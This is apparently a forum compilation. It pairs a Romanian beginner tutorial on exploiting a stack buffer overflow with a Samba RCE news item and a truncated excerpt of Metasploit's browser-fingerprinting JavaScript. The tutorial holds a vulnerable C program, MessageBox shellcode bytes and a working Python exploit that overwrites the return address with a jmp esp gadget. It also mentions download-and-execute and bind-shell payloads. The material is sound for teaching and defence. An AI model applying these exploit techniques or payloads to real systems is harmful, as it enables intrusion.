au cate doi octeti. Instructiunea CALL, care se afla la adresa 0x00261017, are 5 octeti. Asadar adresa instructiunii urmatoare este 0x0026101C (adica 0x00261017 + 5). Aceasta este adresa care va fi pusa pe stiva la apelul functiei. Stiva va arata astfel inainte de apelul functiei, dupa cele doua instructiuni PUSH: 24 - 0x5 28 - 0x6 32 - 0x1337 ; Ce se afla inainte de PUSH-uri Dupa executarea instructiunii CALL, stiva va arata astfel (adresele stivei din prima coloana sunt informative): 20 - 0x0026101C ; Adresa "de return", adresa la care ne vom intoarce la RETN (sau RET), dupa terminarea functiei apelate 24 - 0x5 28 - 0x6 32 - 0x1337 ; Ce se afla inainte de PUSH-uri Urmeaza apoi seria de instructiuni, prolog-ul functiei, care creaza stackframe-urile: - PUSH EBP - MOV EBP,ESP Dupa acel PUSH, stiva va fi de forma: 16 - 32 ; EBP-ul anterior apelului functiei 20 - 0x0026101C ; Adresa "de return", adresa la care ne vom intoarce la RETN (sau RET), dupa terminarea functiei apelate 24 - 0x5 28 - 0x6 32 - 0x1337 ; Ce se afla inainte de PUSH-uri Dupa MOV EBP,ESP - EBP-ul va avea valoarea "varful curent al stivei". E important de retinut ca variabilele locale ale functiei sunt plasate AICI pe stiva! Sa modificam functia astfel: int functie(int a, int { int v1 = 3, v2 = 4; return a + b; } Avem acum in plus doua variabile initializate cu valorile 3 si 4. Noul cod al functiei va avea in plus: SUB ESP,8 ; Se aloca spatiu pentru cele doua variabile (fiecare cate 4 octeti) MOV DWORD PTR SS:[EBP-4],3 ; Initializarea primei variabile MOV DWORD PTR SS:[EBP-8],4 ; Initializarea celei de-a doua variabile Astfel stiva va contine: 08 - 4 ; Variabilele locale 12 - 3 16 - 32 ; EBP-ul anterior apelului functiei 20 - 0x0026101C ; Adresa "de return", adresa la care ne vom intoarce la RETN (sau RET), dupa terminarea functiei apelate 24 - 0x5 28 - 0x6 32 - 0x1337 ; Ce se afla inainte de PUSH-uri E obligatoriu de retinut faptul ca variabilele locale ale functiilor sunt puse pe stiva. E de asemenea obligatoriu de inteles ca "adresa de return" e retinuta tot pe stiva. Daca pana in acest punct nu ati inteles exact cum stau lucrurile, ori cereti mai multe detalii explicand ceea ce nu intelegeti, ori incercati sa va documentati singuri citind multitudinea de tutoriale pe care le gasiti pe Google. Stack Based Buffer Overflow Daca ati inteles toate conceptele de mai sus puteti trece mai departe. Daca nu, recititi si incercati sa intelegeti sau va mai puteti documenta, exista o multitudine de articole din care puteti intelege aceste notiuni. Daca totul este in regula, puteti trece la acest capitol. Discutam ca stiva contine urmatoarele (in aceasta ordine, unde "variabilele locale" se afla la "adresa cea mai mica" iar "parametrii functiei" la "adresa cea mai mare"): - Variabilele locale ale functiei (variabil, sa zicem 20 bytes) - EBP-ul anterior (salvat cu PUSH EBP) - Adresa de return (de exemplu 0x0026101C) - Parametri cu care a fost apelata functia Este destul de usor de inteles acum cum functioneaza un Stack Based Buffer Overflow. Sa luam urmatorul caz. Avem functia urmatoare, apelata din main: #include <stdio.h>#include <string.h> // Functia de afisare a numelui void Afiseaza(char *p_pcNume) { // Buffer-ul in care va fi stocat numele char buffer[20]; // Copiem numele in buffer strcpy(buffer, p_pcNume); // Afisam numele printf("Salut: %s", buffer); } // Functia main int main(int argc, char* argv[]) { // Trebuie sa avem un argument, numele if(argc != 2) { puts("Lipseste argumentul: Ex: ./sbof Ionut"); return 1; } // Apelam functia de afisare Afiseaza(argv[1]); return 0; } Programelul este simplu: primeste un parametru in linia de comanda si apeleaza functia "Afiseaza". Problema se poate vedea aici: char buffer[20]; strcpy(buffer, p_pcNume); Avem un buffer (vector) local, de 20 de octeti. Atentie! Nu confundati un vector cu un pointer (char *buffer)! In cazul unui pointer pentru care s-a alocat spatiu cu "malloc" sau "new []", pe stiva se afla doar pointer-ul (4 octeti) NU si spatiul care a fost alocat pe HEAP! Avand un buffer de 20 de octeti pe stiva, copiem in acea variabila sirul de caractere pe care il primim din linia de comanda. Ce se intampla insa daca sirul de caractere depaseste dimensiunea de 20 de octeti? Avem un buffer overflow. Denumirea de "Stack Based Buffer Overflow" vine de la faptul ca acest buffer este memorat pe stiva. Sa vedem cum ar arata o stiva care ar contine toate datele in momentul apelului functiei. 100 - BUFFER - octetii 0-4 104 - BUFFER - octetii 4-8 108 - BUFFER - octetii 8-12 112 - BUFFER - octetii 12-16 116 - BUFFER - octetii 16-20 120 - 136 ; EBP-ul anterior apelului functiei 124 - 0x0026101C ; Adresa "de return", adresa la care ne vom intoarce la RETN (sau RET), dupa terminarea functiei apelate 128 - 0x5 132 - 0x6 136 - 0x1337 ; Ce se afla inainte de PUSH-uri Daca apelam functia folosind sirul de caractere "Nytro @ RST", stiva va arata astfel: 100 - Nytr 104 - o @ 108 - RST\0 112 - XXXX - octetii 12-16 (XXXX sunt date aleatoare) 116 - XXXX - octetii 16-20 120 - 136 ; EBP-ul anterior apelului functiei ... Probabil v-ati dat seama singuri cum se poate exploata aceasta problema: daca suprascriem CORECT stiva, daca apelam programul cu un sir de caractere corect, astfel incat sa SUPRASCRIEM ADRESA DE RETURN, dupa ce functia "Afiseaza" isi va termina executia, in momentul in care se va apela instructiunea RETN, procesorul va sari la adresa pe care noi am suprascris-o: in locul adresei 0x0026101C vom pune noi o anumita adresa. Putem astfel controla executia procesului! Daca vom apela programul astfel: StackBOF.exe aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa In debugger se va putea observa urmatoarea eroare: "Access violation when executing [61616161]" Daca nu v-ati dat seama, 0x61 este codul ascii al caracterului "a". Deci procesorul incearca sa execute codul de la adresa "aaaa". Ce putem face in acest caz? Ii putem oferi CORECT (adica la locatia corecta in sirul "aaaa...aaaa") o adresa valida de memorie, la care se afla cod valid, obtinand astfel posibilitatea de a executa cod propriu! Cum putem insa executa propriul cod astfel? Raspunsul este simplu: "jmp esp". Intelegem ca am suprascris stiva. Am suprascris atat "adresa de return" dar am suprascris si ce era DUPA adresa de return. Si e important de precizat faptul ca asa cum la "CALL" pe stiva se pune automat adresa de return, asa la RETN, adresa de return e eliberata de pe stiva si procesorul executa instructiuni incepand cu acea adresa. Asa cum la CALL registrul ESP devine ESP-4 deoarece se adauga 4 octeti (adresa de return), asa la RETN registrul ESP devine ESP+4 deoarece se scoate de pe stiva respectiva adresa. Asta inseamna ca ESP este acum un pointer la datele de DUPA adresa de return, un pointer la niste date pe care NOI le-am pus acolo. Asadar, pentru a dezvolta raspunsul "jmp esp": daca gasim undeva in spatiul de memorie al procesului pe care il exploatam, adica in codul executabilului sau codul din DLL-urile folosite de catre proces, o secventa de cod "jmp esp" putem sa plasam adresa acestei instructiuni in locul adresei de return, astfel incat procesorul, dupa executia instructiunii RETN va sari la acea adresa si va executa "jmp esp" si apoi procesorul va executa instructiunile de pe stiva pe care noi o controlam. Sa presupunem ca gasim instructiunea "jmp ESP" la adresa de memorie 0x11223344. Avem pe stiva: 100 - BUFFER - octetii 0-4 104 - BUFFER - octetii 4-8 108 - BUFFER - octetii 8-12 112 - BUFFER - octetii 12-16 116 - BUFFER - octetii 16-20 120 - 136 ; EBP-ul anterior apelului functiei 124 - 0x0026101C ; Adresa "de return", adresa la care ne vom intoarce la RETN (sau RET), dupa terminarea functiei apelate 128 - 0x5 132 - 0x6 136 - 0x1337 ; Ce se afla inainte de PUSH-uri DAR, daca vom suprascrie in mod corect stiva, o vom face astfel: 1. Vom pune "aaaaaaaaaaaaaaaaaaaa" - 20 de octeti - pentru a umple buffer-ul 2. Vom mai pune "aaaa" - 4 octeti - pentru a suprascrie EBP-ul anterior 3. Vom pune 0x11223344 - 4 octeti - adresa de return (adresa instructiunii jmp esp) 4. Vom pune shellcode-ul (cod masina) - pe care vrem sa il executam Stiva va arata astfel: 100 - aaaa 104 - aaaa 108 - aaaa 112 - aaaa 116 - aaaa 120 - aaaa 124 - 0x44332211 ; Little endian 128 - XXXX 132 - XXXX 136 - XXXX ... Unde XXX... e shellcode-ul pe care vrem sa il executam. Daca nu ati mai intalnit acest termen, tineti minte doar ca puteti gasi pe Google/Exploit-DB/Shell-Storm o gramada de shellcode-uri. Exemple: - Download & Execute: care permite descarcarea si executarea unui EXE - Bind TCP: care deschide un port si permite executarea de comenzi - Calc.exe/MessageBox: care deschide calc.exe sau afiseaza un mesaj (pentru teste) Sa vedem pas cu pas cum functioneaza totul (simplificat): void Afiseaza(char *p_pcNume){ char buffer[20]; strcpy(buffer, p_pcNume); } 1. Se primeste argumentul (pentru exploatare) de la tastatura 2. Se apeleaza functia Afiseaza cu acest argument 3. Se pun pe stiva: - pointer la sirul de caractere (parametrul functiei) - adresa de return (la CALL) - EBP anterior (in corpul functiei) (cu PUSH EBP) - buffer-ul (20 de octeti - variabila locala) 4. Se apeleaza strcpy() - se copiaza in buffer primii 20 de octeti (din argumentul de la tastatura) - urmatorii 4 octeti suprascriu EBP-ul enterior - urmatorii 4 octeti suprascriu adresa de return - urmatorii bytes suprascriu restul stivei 5. Se elibereaza spatiul folosit de buffer (se face ADD ESP, 0x14) 6. Se face RETN Ce se intampla acum e important: 1. Se scoate de pe stiva adresa de return (suprascrisa de noi cu o adresa de memorie la care se afla instructiunea "jmp esp") 2. Procesorul sare la adresa respectiva si executa "jmp esp" 3. Efectul este saltul si executia codului prezent pe stiva (ESP-ul contine acum un pointer la datele de dupa "adresa de return") Pe stiva, la adresa ESP, se afla acum shellcode-ul nostru: un limbaj masina care ne permite sa efectuam o anumita actiune, probabil cele mai folosite astfel de actiuni sunt "Download & Execute", adica infectarea cu un trojan sau altceva, sau "Bind TCP", adica ascultarea pe un port pe care noi, ca atacatori, ne putem conecta ulterior si putem executa comenzi. Cum gasim insa o adresa unde se afla instructiunea jmp esp? Ei bine, aici depinde de voi si de debugger-ul pe care il folositi. Scopul acestui articol este sa intelegeti cum se exploateaza un buffer overflow, nu cum sa folositi un debugger, dar voi face o scurta descriere a acestor programe. In testele facute de mine am folosit Immunity Debugger. Este gratuit, simplu si frumos. Puteti incerca de asemenea OllyDbg, IDA Free sau WinDbg. Un debugger poate deschide un executabil (sau dll), il incarca in memorie, il dezasambleaza (transforma codul masina in cod ASM) si permite debugging-ul, adica permite executarea programului instructiune cu instructiune oferind toate informatiile necesare: - instructiunile care se executa sau care urmeaza sa fie executate - toti registrii (EAX, EBX... EBP, ESP, EIP) - anumite zone de memorie (pe care le doriti) - memory dump - stiva, afisand unde este varful acesteia (ESP) De asemenea, un debugger ofera mai multe functionalitati: - permite setarea unor breakpoint-uri, adica permite sa opriti executia programului la o anumita instructiune - permite vizualizarea DLL-urilor folosite de catre executabil (cele incarcate in memorie) si vizualizarea functiilor exportate (Names) - in cazul in care vreti sa puneti breakpoint pe o anumita functie sunt foarte utile aceste informatii - permite vizualizarea thread-urilor curente, a handle-urilor si multe altele - permite cautari in functie de multe criterii - permite modificarea instructiunilor care urmeaza sa fie executate - permite modificarea valorilor registrilor - permite cam tot ce ar putea fi util Pentru a putea gasi o instructiune "jmp esp", ne vom folosi de doua functionalitati: - vizualizarea codului DLL-urilor - cautarea comenzilor (sau sirurilor binare) in memoria executabilului sau a DLL-urilor In Immunity debugger, pentru a deschide kernel32.dll (toate executabilele incarca in memorie si folosesc DLL-urile kernel32 si ntdll), de exemplu, apasam pe butonul "E" apoi facem dublu click pe kernel32.dll. Daca nu vom gasi un jmp esp in acest DLL, incercam in toate celelalte "module" (.exe sau .dll). Dupa ce s-a deschis, dam click dreapta > Search for > All commands si introducem "jmp esp". Vom vedea apoi o lista cu toate adresele la care gasim acea instructiune. Ei bine, asa se poate face in Immunity, exista mult mai multe metode, in functie de Debugger, alegeti ceea ce vi se pare mai simplu. O alta metoda ar fi Search For > Binary String > "FF E4", adica codul masina care reprezinta instructiunea "jmp esp". In cazul meu, pe Windows XP, am gasit instructiunea "jmp esp" in kernel32.dll la adresa 0x7C86467B, reprezentata in little endian ca 0x7b46867c. Scopul acestui articol este doar de a intelege cum functioneaza si vom folosi un shellcode de teste, un cod masina care afiseaza un simplu mesaj pentru a stii daca am reusit sau nu sa exploatam problema. Pentru teste eu am ales acest shellcode: http://www.exploit-db.com/exploits/28996/ "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42""\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03""\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b""\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e""\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c""\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74""\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe""\x49\x0b\x31\xc0\x51\x50\xff\xd7" Pe intelesul tuturor, cand procesorul va executa acel cod masina pe un sistem Windows, va apela functia "MessageBox" si va afisa un mesaj. Astfel, pentru simplitate, vom scrie codul in Python. Adica din Python vom genera sirul de caractere necesar pentru a apela programul si a executa codul nostru. Exploit-ul scris in Python este urmatorul: #!/usr/bin/pythonimport ctypes import subprocess buffer = "\x41" * 24 buffer += "\x7b\x46\x86\x7c" buffer += ("\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42" "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03" "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b" "\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e" "\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c" "\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74" "\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe" "\x49\x0b\x31\xc0\x51\x50\xff\xd7") subprocess.call(['C:\\Documents and Settings\\Administrator\\Desktop\\Stack BOF\\StackBOF.exe', buffer]) E destul de usor de inteles ce face pentru ca am explicat anterior: - buffer = "\x41" * 24 - Suprascriem buffer si EBP de pe stack - buffer += "\x7b\x46\x86\x7c" - Suprascriem adresa de return cu adresa unei instructiuni jmp esp (instructiunea se va afla intotdeauna la acea adresa daca nu exista ASLR si daca e vorba despre ACELASI sistem de operare - altfel spus, poate sa difere intre XP SP1, XP SP2 si XP SP3) - buffer += ("\x31\xd2\xb2...\x51\x50\xff\xd7") - Shellcode-ul care afiseaza un mesaj - subprocess.call(...) - Apelam executabilul cu buffer-ul (numit si PAYLOAD) nostru care ne permite sa executam propriul cod Daca nu vi se pare foarte util, incercati sa va ganditi ca aceasta problema poate sa apara in cazuri mai "utile": - la deschiderea unui document (.pdf, .docx, .xlsx) - la citirea unor date pe socket (server FTP, server SSH) - la deschiderea unor pagini web (IE, Firefox) Problema poate sa apara in foarte multe locuri si se poate exploata pentru multe programe. Sa nu aveti insa asteptari prea mari sa descoperiti o astfel de problema in programe importante: Google Chrome, Mozilla, Office Word/Excel, Adobe Reader... Puteti gasi insa probleme mai complicate: Use after free, Type confusion, Heap overflow etc, probleme care sunt insa mult mai dificil de descoperit si de exploatat. Mecanisme de protectie Exsita cateva mecanisme create special pentru a proteja aplicatiile de astfel de probleme. Aceste mecanisme pot fi oferite atat de catre sistemul de operare cat si de catre compilator. DEP - Data Execution Prevention este un mecanism de protectie atat hardware (NX bit) cat si software care NU permite executia de cod din zonele care nu au permisiunile de "execute". O zona/pagina de memorie poate avea permisiuni de "read", "write" si/sau "execute". O zona de date ar avea in mod normal permisiuni de "read" si/sau "write" iar o zona de cod ar avea permisiuni de "read" si "execute". Stiva (read+write) este o zona de memorie de pe care nu ar trebui sa existe posibilitatea de a se executa cod (dar fara DEP exista), iar DEP ofera exact aceasta masura de protectie. Probabil ati inteles mai devreme ca shellcode-ul este pus pe stiva si executat de catre procesor de pe stiva. DEP nu va permite acest lucru. Pentru a activa DEP pe un executabil, din Visual Studio activati optiunea din Configuration > Linker > Advanced > Data Execution Prevention (/NXCOMPAT). ASLR - Address Space Layour Randomization, care a fost introdus in Windows Vista si este motivul pentru care din simplitate am ales sa invatam pe un Windows XP, este o alta metoda de protectie a sistemului de operare impotriva acestor atacuri. Dupa cum ati observat, un proces si DLL-urile folosite de catre acesta sunt incarcate in mod obisnuit la aceeasi adresa de memorie. De aceea exista posibilitatea de a stii cu exactitate la ce adresa de memorie se afla anumite instructiuni (jmp esp de exemplu) pe care le putem folosi in exploatarea unui buffer overflow. ASLR randomizeaza adresele la care sunt incarcate in memorie mai multe elemente cheie ale unui proces: executabilul si DLL-urile, heap-ul si stiva. Astfel este mult mai dificil pentru un atacator sa ghiceasca adresa la care se afla o anumita instructiune pentru a o putea executa. Activarea din Visual Studio se face ca si DEP din Configuration > Linker > Advanced > Randomized Base Address (/DYNAMICBASE). Stack Cookies - Este o alta metoda de protectie oferita de catre compilator care are rolul de a proteja aplicatiile impotriva atacurilor de acest tip prin plasarea pe stiva, la inceputul unei functii, a unei valori aleatoare denumita "stack cookie" (___stack_cookie). Imediat inainte de a pune pe stiva variabilele locale este pusa aceasta valoare aleatoare. Ceea ce intampla de fapt, este faptul ca daca o variabila locala (buffer) este suprascrisa si datele de pe stack sunt suprascrise, atunci va fi suprascrisa si aceasta valoare aleatoare care este verificata imediat inainte de iesirea din functie (inainte de RETN). Daca a fost suprascrisa, executia programului va fi oprita. Este foarte dificil ca un atacator sa ghiceasca exact acea valoare si sa nu o corupa. Atentie! Daca vreti sa faceti teste, dezactivati aceasta optiune din Visual Studio deoarece este activata in mod implicit. Pentru activare sau dezactivare mergeti la Configuration > C/C++ > Code Generation > Buffer Security Check (/GS). Tutorialul se adreseaza incepatorilor, de aceea am ales: - Windows XP pentru ca nu ofera ASLR - Executabilul nu are DEP activat - Executabilul nu are GS (stack cookies) activate Concluzie Desi poate parea foarte usor sa exploatezi o astfel de problema, principala dificultate consta in intelegerea limbajului de asamblare si a anumitor concepte, o exploatare efectiva a unei astfel de probleme este mult mai dificila, tocmai din cauza faptului ca exista mai multe mecanisme de protectie. Exista anumite lucruri care se pot face in anumite cazuri pentru a face "bypass" acestor elemente de protectie, insa dificultatea acestora depaseste scopul acestui material. Sugestia mea pentru voi este sa compilati un astfel de programel, excluzand mecanismele de protectie, si sa incercati sa il exploatati singuri. De asemenea, puteti incerca sa modificati dimensiunea buffer-ului sa vedeti ce se intampla si cel mai important este sa executati pas cu pas fiecare instructiune urmarind stiva pentru a intelege complet aceste notiuni. Lasati acum teoria, puneti mana pe debugger si treceti la treaba! Daca aveti intrebari le astept aici. De asemenea astept pareri legate de acest articol, daca m-am facut inteles, daca e corect tot ce am spus etc. pentru a-l putea perfectiona. Multumesc, Nytro @ Romanian Security Team

Samba hit by remote code execution vulnerability Samba got tangoed By Chris Merriman THE SAMBA PROTOCOL has been flagged as having a major vulnerability that could allow intruders to gain superuser permissions on network devices. Samba is an open source implementation of the SMB protocol used by Microsoft Windows machines to enable file sharing and transfer between machines. Implementations of the SAMBA protocol on machines running other operating systems allow seamless transfer to and from these machines too. A fault in the nmbd NetBIOS name service daemon causes memory operations to be mishandled by Samba. This can provide back doors for hackers to exploit the bug as part of wider attacks. An advisory issued this week under the summary title "Samba 4.0.0 to 4.1.10 are affected by a remote code execution attack on unauthenticated nmbd NetBIOS name services" explained, "A malicious browser can send packets that may overwrite the heap of the target nmbd NetBIOS name services daemon. It may be possible to use this to generate a remote code execution vulnerability as the superuser (root)." The problem was discovered and repaired by Volker Lendecke, a Samba Team member working for Sernet in Germany. A patch has been issued to address the problem, along with new Samba versions 4.1.11 and 4.0.21 to correct the problem. The new Samba versions will need to be compiled into new firmware versions for equipment such as NAS drives, and users are advised to avoid any processes involving the NetBIOS nmbd daemon until a fix is put in place. It has been a dark year for software vulnerabilities so far with OpenSSL, Steam, and the perennial favourite Microsoft's Internet Explorer web browser among a string of high profile targets. µ Sursa: Samba hit by remote code execution vulnerability- The Inquirer

Bucata din Metasploit: /** * This can reliably detect browser versions for IE and Firefox even in the * presence of a spoofed User-Agent. OS detection is more fragile and * requires truthful navigator.appVersion and navigator.userAgent strings in * order to be accurate for more than just IE on Windows. **/ // Case matters, see lib/msf/core/constants.rb // All of these should match up with constants in ::Msf::HttpClients clients_opera = "Opera"; clients_ie = "MSIE"; clients_ff = "Firefox"; clients_chrome= "Chrome"; clients_safari= "Safari"; // All of these should match up with constants in ::Msf::OperatingSystems oses_linux = "Linux"; oses_windows = "Microsoft Windows"; oses_mac_osx = "Mac OS X"; oses_freebsd = "FreeBSD"; oses_netbsd = "NetBSD"; oses_openbsd = "OpenBSD"; // All of these should match up with the ARCH_* constants arch_armle = "armle"; arch_x86 = "x86"; arch_x86_64 = "x86_64"; arch_ppc = "ppc"; window.os_detect = {}; /** * This can reliably detect browser versions for IE and Firefox even in the * presence of a spoofed User-Agent. OS detection is more fragile and * requires truthful navigator.appVersion and navigator.userAgent strings in * order to be accurate for more than just IE on Windows. **/ window.os_detect.getVersion = function(){ //Default values: var os_name; var os_flavor; var os_sp; var os_lang; var ua_name; var ua_version; var arch = ""; var useragent = navigator.userAgent; // Trust but verify... var ua_is_lying = false; var version = ""; var unknown_fingerprint = null; var css_is_valid = function(prop, propCamelCase, css) { if (!document.createElement) return false; var d = document.createElement('div'); d.setAttribute('style', prop+": "+css+";") return d.style[propCamelCase] === css; } var input_type_is_valid = function(input_type) { if (!document.createElement) return false; var input = document.createElement('input'); input.setAttribute('type', input_type); return input.type == input_type; } //-- // Client //-- if (window.opera) { ua_name = clients_opera; if (!navigator.userAgent.match(/Opera/)) { ua_is_lying = true; } // This seems to be completely accurate, e.g. "9.21" is the return // value of opera.version() when run on Opera 9.21 ua_version = opera.version(); if (!os_name) { // The 'inconspicuous' argument is there to give us a real value on // Opera 6 where, without it, the return value is supposedly // 'Hm, were you only as smart as Bjorn Vermo...' // though I have not verfied this claim. switch (opera.buildNumber('inconspicuous')) { case "344": // opera-9.0-20060616.1-static-qt.i386-en-344 case "1347": // Opera 9.80 / Ubuntu 10.10 (Karmic Koala) case "2091": // opera-9.52-2091.gcc3-shared-qt3.i386.rpm case "2444": // opera-9.60.gcc4-shared-qt3.i386.rpm case "2474": // Opera 9.63 / Debian Testing (Lenny) case "4102": // Opera 10.00 / Ubuntu 8.04 LTS (Hardy Heron) case "6386": // 10.61 os_name = oses_linux; break; case "1074": // Opera 11.50 / Windows XP case "1100": // Opera 11.52 / Windows XP case "3445": // 10.61 case "3516": // Opera 10.63 / Windows XP case "7730": // Opera 8.54 / Windows XP case "8502": // "Opera 9 Eng Setup.exe" case "8679": // "Opera_9.10_Eng_Setup.exe" case "8771": // "Opera_9.20_Eng_Setup.exe" case "8776": // "Opera_9.21_Eng_Setup.exe" case "8801": // "Opera_9.22_Eng_Setup.exe" case "10108": // "Opera_952_10108_en.exe" case "10467": // "Opera_962_en_Setup.exe" case "10476": // Opera 9.63 / Windows XP case "WMD-50433": // Windows Mobile - "Mozilla/5.0 (Windows Mobile; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 10.00" os_name = oses_windows; break; case "2480": // Opera 9.64 / FreeBSD 7.0 os_name = oses_freebsd; break; case "6386": // 10.61 os_name = oses_mac_osx; break; case "1407": // In the case of mini versions, the UA is quite a bit // harder to spoof, so it's correspondingly easier to // trust. Unfortunately, despite being fairly truthful in // what OS it's running on, Opera mini seems to lie like a // rug in regards to the browser version. // // iPhone, iOS 5.0.1 // Opera/9.80 (iPhone; Opera Mini/7.1.32694/27.1407; U; en) Presto/2.8.119 Version/11.10.10 // Android 2.3.6, opera mini 7.1 // Opera/9.80 (Android; Opera Mini/7.29530/27.1407; U; en) Presto/2.8.119 Version/11.101.10 if (navigator.userAgent.indexOf("Android")) { os_name = oses_linux; os_flavor = "Android"; } else if (navigator.userAgent.indexOf("iPhone")) { os_name = oses_mac_osx; os_flavor = "iPhone"; } break; // A few are ambiguous, record them here case "1250": // Opera 9.80 / Windows XP // Opera 11.61 / Windows XP // Opera 11.61 / Debian 4.0 (Etch) break; default: unknown_fingerprint = opera.buildNumber('inconspicuous'); break; } } } else if (typeof window.onmousewheel != 'undefined' && ! (typeof ScriptEngineMajorVersion == 'function') ) { // IE 10 now has onmousewheel // Then this is webkit, could be Safari or Chrome. // Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1 // Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5 // Mozilla/5.0 (Linux; U; Android 2.2; en-au; GT-I9000 Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 // Mozilla/5.0 (iPod; U; CPU iPhone OS 4_2_1 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Mobile/8C148 // Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/7B405 // Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3 // Google Chrome has window.google (older versions), window.chromium (older versions), and window.window.chrome (3+) if (window.chromium || window.google || window.chrome) { ua_name = clients_chrome; search = "Chrome"; } else { ua_name = clients_safari; search = "Version"; } platform = navigator.platform.toLowerCase(); // Just to be a pain, iPod and iPad both leave off "Safari" and // "Version" in the UA, see example above. Grab the webkit version // instead. =/ if (platform.match(/ipod/)) { os_name = oses_mac_osx; os_flavor = "iPod"; arch = arch_armle; search = "AppleWebKit"; } else if (platform.match(/ipad/)) { os_name = oses_mac_osx; os_flavor = "iPad"; arch = arch_armle; search = "AppleWebKit"; } else if (platform.match(/iphone/)) { os_name = oses_mac_osx; os_flavor = "iPhone"; arch = arch_armle; } else if (platform.match(/macintel/)) { os_name = oses_mac_osx; arch = arch_x86; } else if (platform.match(/linux/)) { os_name = oses_linux; if (platform.match(/x86_64/)) { arch = arch_x86_64; } else if (platform.match(/arm/)) { // Android and maemo arch = arch_armle; if (navigator.userAgent.match(/android/i)) { os_flavor = 'Android'; } } } else if (platform.match(/windows/)) { os_name = oses_windows; } ua_version = this.searchVersion(search, navigator.userAgent); if (!ua_version || 0 == ua_version.length) { ua_is_lying = true; } } else if (navigator.oscpu && !document.all && navigator.taintEnabled || 'MozBlobBuilder' in window) { // Use taintEnabled to identify FF since other recent browsers // implement window.getComputedStyle now. For some reason, checking for // taintEnabled seems to cause IE 6 to stop parsing, so make sure this // isn't IE first. // Also check MozBlobBuilder because FF 9.0.1 does not support taintEnabled // Then this is a Gecko derivative, assume Firefox since that's the // only one we have sploits for. We may need to revisit this in the // future. This works for multi/browser/mozilla_compareto against // Firefox and Mozilla, so it's probably good enough for now. ua_name = clients_ff; // Thanks to developer.mozilla.org "Firefox for developers" series for most // of these. // Release changelogs: http://www.mozilla.org/en-US/firefox/releases/ if (css_is_valid('flex-wrap', 'flexWrap', 'nowrap')) { ua_version = '28.0'; } else if (css_is_valid('cursor', 'cursor', 'grab')) { ua_version = '27.0'; } else if (css_is_valid('image-orientation', 'imageOrientation', '0deg')) { ua_version = '26.0'; } else if (css_is_valid('background-attachment', 'backgroundAttachment', 'local')) { ua_version = '25.0'; } else if ('DeviceStorage' in window && window.DeviceStorage && 'default' in window.DeviceStorage.prototype) { // https://bugzilla.mozilla.org/show_bug.cgi?id=874213 ua_version = '24.0'; } else if (input_type_is_valid('range')) { ua_version = '23.0'; } else if ('HTMLTimeElement' in window) { ua_version = '22.0'; } else if ('createElement' in document && document.createElement('main') && document.createElement('main').constructor === window['HTMLElement']) { ua_version = '21.0'; } else if ('imul' in Math) { ua_version = '20.0'; } else if (css_is_valid('font-size', 'fontSize', '23vmax')) { ua_version = '19.0'; } else if ('devicePixelRatio' in window) { ua_version = '18.0'; } else if ('createElement' in document && document.createElement('iframe') && 'sandbox' in document.createElement('iframe')) { ua_version = '17.0'; } else if ('mozApps' in navigator && 'install' in navigator.mozApps) { ua_version = '16.0'; } else if ('HTMLSourceElement' in window && HTMLSourceElement.prototype && 'media' in HTMLSourceElement.prototype) { ua_version = '15.0'; } else if ('mozRequestPointerLock' in document.body) { ua_version = '14.0'; } else if ('Map' in window) { ua_version = "13.0"; } else if ('mozConnection' in navigator) { ua_version = "12.0"; } else if ('mozVibrate' in navigator) { ua_version = "11.0"; } else if (css_is_valid('-moz-backface-visibility', 'MozBackfaceVisibility', 'hidden')) { ua_version = "10.0"; } else if ('doNotTrack' in navigator) { ua_version = "9.0"; } else if ('insertAdjacentHTML' in document.body) { ua_version = "8.0"; } else if ('ondeviceorientation' in window && !('createEntityReference' in document)) { ua_version = "7.0"; } else if ('MozBlobBuilder' in window) { ua_version = "6.0"; } else if ('isGenerator' in Function) { ua_version = "5.0"; } else if ('isArray' in Array) { ua_version = "4.0"; } else if (document.readyState) { ua_version = "3.6"; } else if (String.trimRight) { ua_version = "3.5"; } else if (document.getElementsByClassName) { ua_version = "3"; } else if (window.Iterator) { ua_version = "2"; } else if (Array.every) { ua_version = "1.5"; } else { ua_version = "1"; } if (navigator.oscpu != navigator.platform) { ua_is_lying = true; } // oscpu is unaffected by changes in the useragent and has values like: // "Linux i686" // "Windows NT 6.0" // haven't tested on 64-bit Windows version = navigator.oscpu; if (version.match(/i.86/)) { arch = arch_x86; } if 